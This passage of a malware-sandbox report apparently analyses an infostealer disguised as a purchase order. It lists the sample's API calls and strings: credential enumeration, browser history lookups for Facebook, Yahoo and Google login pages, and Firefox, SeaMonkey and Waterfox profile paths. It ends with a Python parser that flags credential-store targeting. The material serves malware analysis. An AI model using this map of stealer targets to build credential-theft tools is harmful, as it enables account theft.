                                                                                                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                      • String ID: visited:
                                                                                                      • API String ID: 2470578098-1702587658
                                                                                                      • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                      • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                      • free.MSVCRT ref: 0040E28B
                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                      • API String ID: 2804212203-2982631422
                                                                                                      • Opcode ID: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                      • Opcode Fuzzy Hash: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041249C
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                      • wcscpy.MSVCRT ref: 004125A0
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                      • String ID: r!A$?a
                                                                                                      • API String ID: 2791114272-867810475
                                                                                                      • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                      • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                      • memset.MSVCRT ref: 0040BC75
                                                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 115830560-3916222277
                                                                                                      • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                      • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                                                      • free.MSVCRT ref: 0041848B
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile$ErrorLastfree
                                                                                                      • String ID: |A
                                                                                                      • API String ID: 77810686-1717621600
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                      • String ID: $0.@$?a
                                                                                                      • API String ID: 2758756878-4046325517
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                      • API String ID: 2936932814-4196376884
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040A824
                                                                                                      • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • wcscpy.MSVCRT ref: 0040A854
                                                                                                      • wcscat.MSVCRT ref: 0040A86A
                                                                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                      • String ID: C:\Windows\system32
                                                                                                      • API String ID: 669240632-2896066436
                                                                                                      APIs
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                      • wcslen.MSVCRT ref: 0040BE06
                                                                                                      • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                      • memset.MSVCRT ref: 0040BE91
                                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                      • wcschr.MSVCRT ref: 0040BF24
                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 697348961-0
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                                      • API String ID: 4039892925-11920434
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                      • API String ID: 4039892925-2068335096
                                                                                                      • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                      • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                                      • memset.MSVCRT ref: 00404020
                                                                                                      • memset.MSVCRT ref: 00404035
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                      • API String ID: 4039892925-3369679110
                                                                                                      • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                      • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
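The two records above (SeaMonkey and Firefox profile paths) and the SHGetSpecialFolderPathW helper they both call share one fixed layout: an APIs list with direct and lifted ("Part of subcall function") references, an optional Strings block with xrefs, and a Similarity block whose API ID, String ID and fuzzy hashes are what you pivot on across reports. The following Python is an added example by the editor, not part of the Joe Sandbox report or its plugin: it parses that layout, pulls the CSIDL constant out of the SHGetSpecialFolderPathW call (0000001A is CSIDL_APPDATA), lists export names the sample resolves through GetProcAddress, and flags records whose strings point at a Mozilla profile directory. The CSIDL table and the credential-store path markers are the editor's assumptions, and the embedded input is constructed from records copied off this page with the Memory Dump Source and Opcode lines trimmed.

```python
from __future__ import annotations
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed input: two function records from this report, in the layout the
# Joe Sandbox IDA plugin emits (Memory Dump Source and Opcode lines trimmed).
SAMPLE_REPORT = r"""
APIs
• memset.MSVCRT ref: 00403FE1
• memset.MSVCRT ref: 00403FF6
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
• memset.MSVCRT ref: 004040FC
Strings
Similarity
• API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
APIs
  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
• SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
• RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
• wcscpy.MSVCRT ref: 00414CFC
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
Similarity
• API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
"""

# One "• api.MODULE(args), ref: addr" line, optionally lifted from a subcall.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Editor's assumptions: CSIDL values from shlobj.h (0x1A is roaming AppData) and the
# AppData-relative directories where Mozilla browsers keep key4.db / logins.json.
CSIDL_NAMES = {0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"}
CREDENTIAL_STORE_MARKERS = (r"Mozilla\Firefox\Profiles", r"Mozilla\SeaMonkey\Profiles", r"Mozilla\Profiles")

# args: recovered argument values ("?" when unknown); ref: call site; subcall_of: callee address or None.
ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    api_id: str = ""
    fuzzy_hash: str = ""


def parse_records(text: str) -> list[FunctionRecord]:
    """Split plugin output into one record per 'APIs' header."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            rec, section = FunctionRecord(), "APIs"
            records.append(rec)
        elif line in SECTIONS:
            section = line
        elif not line or rec is None:
            continue
        elif section == "APIs":
            m = API_LINE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                rec.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings":  # "<string>, xrefs: <addr>, <addr>"
            rec.strings.append(line.lstrip("• ").partition(", xrefs:")[0].strip())
        elif section == "Similarity":
            key, _, value = map(str.strip, line.lstrip("• ").partition(":"))
            if key == "API ID":
                rec.api_id = value
            elif key == "String ID":  # several strings are joined with '$'
                rec.strings.extend(s for s in value.split("$") if s)
            elif key == "Instruction Fuzzy Hash":
                rec.fuzzy_hash = value
    for r in records:  # the Strings block and the String ID usually repeat each other
        r.strings = list(dict.fromkeys(r.strings))
    return records


def special_folders(rec: FunctionRecord) -> list[str]:
    """CSIDL constants passed as the third argument of SHGetSpecialFolderPathW."""
    out = []
    for c in rec.apis:
        if c.name == "SHGetSpecialFolderPathW" and len(c.args) > 2 and re.fullmatch(r"[0-9A-F]{8}", c.args[2]):
            n = int(c.args[2], 16)
            out.append(CSIDL_NAMES.get(n, f"CSIDL_0x{n:02X}"))
    return out


def resolved_imports(rec: FunctionRecord) -> list[str]:
    """Export names passed to GetProcAddress where the plugin recovered the string."""
    return [c.args[1] for c in rec.apis if c.name == "GetProcAddress"
            and len(c.args) > 1 and not re.fullmatch(r"[0-9A-F]{8}|\?", c.args[1])]


def credential_store_records(records: list[FunctionRecord]) -> list[FunctionRecord]:
    return [r for r in records if any(m in s for s in r.strings for m in CREDENTIAL_STORE_MARKERS)]
```

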